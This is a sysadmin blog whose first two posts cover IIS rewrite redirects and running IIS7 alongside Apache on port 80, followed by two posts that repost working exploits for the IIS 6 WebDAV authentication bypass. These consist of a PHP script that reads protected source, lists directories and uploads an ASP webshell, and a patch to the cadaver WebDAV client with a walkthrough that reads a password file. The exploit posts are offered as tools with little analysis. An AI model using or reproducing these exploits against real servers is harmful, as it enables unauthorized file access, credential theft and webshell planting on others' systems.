Oct 09

Install IIS Rewrite and add domain 301 redirect rule

By jason IIS Server No Comments »

1. download IIS Rewrite

2.unzip iis_urlrewirte.zip to special directory (example:c:\rewrite)

3.Add iisapi for special site

4.restart iis

5.rewrite rule
   5.1domain.com redirect to www.domain.com

# ISAPI_Rewrite 2.x 
[ISAPI_Rewrite]
# 3600 = 1 hour
CacheClockRate 3600
RepeatLimit 32
RewriteCond Host: ^domain\.com$ RewriteRule (.*) http\://www\.domain\.com$1 [I,RP]

# ISAPI_Rewrite 3.0
[ISAPI_Rewrite] # 3600 = 1 hour
CacheClockRate 3600
RepeatLimit 32
RewriteCond %{HTTP:Host} ^domain\.com$ RewriteRule (.*) http\://www\.domain\.com$1 [NC,R=301]

   5.2 let oldpage.html redirect to newpage.html

# ISAPI_Rewrite 2.x
[ISAPI_Rewrite] # 3600 = 1 hour
CacheClockRate 3600
RepeatLimit 32
RewriteRule ^/oldpage.html$ http://domain.com/newpage.html[I,O,RP,L]

# ISAPI_Rewrite 3.0 
[ISAPI_Rewrite] # 3600 = 1 hour
CacheClockRate 3600
RepeatLimit 32 RewriteRule ^/oldpage.html$ http://domain.com/newpage.html[NC,L,R=301,O]

6.Refrence

http://www.isapirewrite.com/

Tagged with:
Sep 15

iis7 and apache share port 80 in windows2008

By jason Apache Server No Comments »

1) Added or make sure your machine has two or more ip’s
2) Open a command prompt
3) Type netsh
4) Type http
5) Type sho iplisten. It should be blank
6) Type add iplisten ipaddress=192.168.0.90
You should get IP address successfully added
7) Type sho iplisten again
It should sho 192.168.0.90 in the list
8) Type exit to get out of netsh
9) Type type netstat -an. See if you notice 192.168.0.90:80 in the list. If you see 0.0.0.0:80, do an iisreset
10) Download and install Apache ( I did it with 2.2.4)
http://mirror.nyi.net/apache/httpd/binaries/win32/apache_2.2.4-win32-x86…
11) Do a default install,
12) Open httpd.conf and adjust the ip listen to 192.168.0.91:80

# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, instead of the default. See also the
# directive.
#
# Change this to Listen on specific IP addresses as shown below to
# prevent Apache from glomming onto all bound IP addresses (0.0.0.0)
#
#Listen 12.34.56.78:80
#Was 80
#Change to

Listen 192.168.0.91:80

12) Restart the Apache service. (for some reason the start / stop thing didn’t work for me, I used net stop apache2 net start apache2.)
13) Type netstat -an
14) You should see 192.168.0.90:80 and 192.168.0.91:80. Open a browser and test both IP’s to see if IIS7 and Apache come up.
15) Test restarting Apache service to see if it works after that.
16) Turn off Apache, browse IIS, turn of IIS, browse Apache. Test it every which way to see if it works.

Tagged with:
May 22

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php)

By jason Security Bulletin No Comments »

<?

print_r(‘
********  IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org  ********
                                                        
       Usage: php ‘.$argv[0].’ source/path/put host path   
       Example: php ‘.$argv[0].’ source www.tian6.com /blog/readme.asp       
       Example2: php ‘.$argv[0].’ path www.tian6.com /secret/
       Example3: php ‘.$argv[0].’ put www.tian6.com /secret/ test.txt(evil code as test.txt)
****************************************************************
‘);

//verification du debut
if($argv[1]!=”source”&&$argv[1]!=”path”&&$argv[1]!=”put”){echo “Choose a action,source or path or put.”;die;}
else {$action=$argv[1];}

if(stristr($argv[2],”http://”)){echo “No http:// in the host!”;die;}
else{$host=$argv[2];}

if(stristr($argv[3],”/”)==false){echo “Where is the / ?”;die;}
else{$path=$argv[3];}
//sent
function sent($sock)  
{  
global  $host, $html;  
$ock=fsockopen(gethostbyname($host),’80′);  
if (!$ock) {  
echo ‘No response from ‘.$host; die;  
}  
fputs($ock,$sock);  
$html=”;  
while (!feof($ock)) {  
$html.=fgets($ock);  
}  
fclose($ock);  
}  

if($action==”source”){
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af/”,$position,1);
 $sock=”GET “.$path.” HTTP/1.1\r\n”;
    $sock.=”Translate: f\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n\r\n”;
 sent($sock);
 echo $html;
 die;
 }
if($action==”path”){
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af”,$position,0);
 $sock=”PROPFIND  “.$path.” HTTP/1.1\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n”;
 $sock.=’Content-Type: text/xml; charset=”utf-8″‘.”\r\n”;
 $sock.=”Content-Length: 0\r\n\r\n”;
    $sock.=’<?xml version=”1.0″ encoding=”utf-8″?><D:propfind xmlns:D=”DAV:”><D:prop xmlns:R=”http://www.foo.bar/boxschema/”><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>’;
    sent($sock);
 $bur=explode(“<a:href>”,$html);
    foreach($bur as $line){$no=strpos($line,”<”);$resultat.=substr($line,0,$no).”\n”;}
    echo $resultat;
 die;
    }
if($action==”put”){
 echo “Remember,keep urfile in type txt!\r\n\r\n”;
     $fp = fopen(“test.txt”, ‘r’);
  if($fp!=false){
     while (false!==($char = fgets($fp))) {
     $fir1=$char;
     }
     fclose($fp);
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af”,$position,0);
    $sock=”PUT “.$path.”test.txt HTTP/1.1\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
 $sock.=’Content-Type: text/xml; charset=”utf-8″‘.”\r\n”;
 $sock.=”Connection:close\r\n”;
 $sock.=”Content-Length: “.strlen($fir1).”\r\n\r\n”;
    $sock.=”".$fir1.”\r\n”;
    echo $sock; sent($sock);sleep(2);
 $sock=”MOVE “.$path.”test.txt HTTP/1.1\r\n”;
    $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n”;
 $sock.=”Destination: “.$path.”racle.asp\n\n”;
    sent($sock);
 echo “Be cool,man! Webshell is http://”.$host.$path.”racle.asp“;
 die;}
 else{die;}
 }

Tagged with:
May 21

Microsoft IIS6 WebDAV Remote Authentication Bypass Exploit (patch)

By jason Security Bulletin 1 Comment »

Blog with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
#
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
# > mkdir cadaver-h4x
# > cd cadaver-h4x
# > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
# –snip–
# > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
# –snip–
# > tar xzvf cadaver-0.23.2.tar.gz
# –snip–
# > cd cadaver-0.23.2/
# > patch -p1 < ../cadaver-0.23.2-h4x.patch
# patching file lib/neon/ne_basic.c
# patching file lib/neon/ne_request.c
# patching file lib/neon/ne_uri.c
# > ./configure
# –snip–
# > make
# –snip–
#
# Now we should have a patched, compiled version of cadaver, so start it
# up with the server that was identified as having a vulnerable folder
# earlier:
#
# > ./cadaver xxx.xxx.xxx.xxx
#
# This should drop you to a “dav:/>” prompt. Now just cd into the
# vulnerable folder and check out what’s there:
#
# dav:/> cd secret
# dav:/secret/> ls
# Listing collection `/secret/’: succeeded.
#        password.txt                           7  May 19 10:40
# dav:/secret/> cat password.txt
# Displaying `/secret/password.txt’:
# ron$pr0ns
# dav:/secret/>
#
# Here’s a list of commands that I’ve tested that work with the patched
# cadaver on a vulnerable folder:
# * CD
# * LS
# * MOVE
# * PUT
# * GET
# * CAT
# * DELETE

diff -rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c
— cadaver-0.23.2/lib/neon/ne_basic.c    2008-02-07 16:22:07.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_basic.c    2009-05-20 16:13:46.000000000 -0500
@@ -402,7 +402,7 @@
     value = "infinity";
     break;
     }
-    ne_add_request_header(req, "Depth", value);
+    ne_add_request_header(req, "Depth", "1");
}
static int copy_or_move(ne_session *sess, int is_move, int overwrite,
diff -rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c
— cadaver-0.23.2/lib/neon/ne_request.c    2008-01-30 05:35:52.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_request.c    2009-05-20 16:35:46.000000000 -0500
@@ -405,6 +405,7 @@
                            "Connection: TE" EOL
                            "TE: trailers" EOL);
     }
+    ne_buffer_czappend(req->headers, "Translate: f" EOL);
}
int ne_accept_always(void *userdata, ne_request *req, const ne_status *st)
@@ -420,6 +421,7 @@
ne_request *ne_request_create(ne_session *sess,
                   const char *method, const char *path)
{
+    char *path2 = ne_calloc(strlen(path)+7);
     ne_request *req = ne_calloc(sizeof *req);
     req->session = sess;
@@ -435,13 +437,18 @@
     req->method = ne_strdup(method);
     req->method_is_head = (strcmp(method, "HEAD") == 0);
+    if(strlen(path)>2)
+        sprintf(path2, "%c%c%%c0%%af%s", path[0], path[1], path+2);
+    else
+        path2 = path;
+
     /* Only use an absoluteURI here when absolutely necessary: some
      * servers can’t parse them. */
-    if (req->session->use_proxy && !req->session->use_ssl && path[0] == ‘/’)
+    if (req->session->use_proxy && !req->session->use_ssl && path2[0] == ‘/’)
     req->uri = ne_concat(req->session->scheme, "://",
-                 req->session->server.hostport, path, NULL);
+                 req->session->server.hostport, path2, NULL);
     else
-    req->uri = ne_strdup(path);
+    req->uri = ne_strdup(path2);
     {
     struct hook *hk;
diff -rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c
— cadaver-0.23.2/lib/neon/ne_uri.c    2007-12-05 05:04:47.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_uri.c    2009-05-20 16:13:46.000000000 -0500
@@ -96,7 +96,7 @@
/* 0xXX    x0      x2      x4      x6      x8      xA      xC      xE     */
/*   0x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
/*   1x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
-/*   2x */ OT, SD, OT, GD, SD, PC, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
+/*   2x */ OT, SD, OT, GD, SD, AL, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
/*   3x */ DG, DG, DG, DG, DG, DG, DG, DG, DG, DG, CL, SD, OT, SD, OT, QU,
/*   4x */ AT, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL,
/*   5x */ AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, GD, OT, GD, OT, US,

Tagged with:
preload preload preload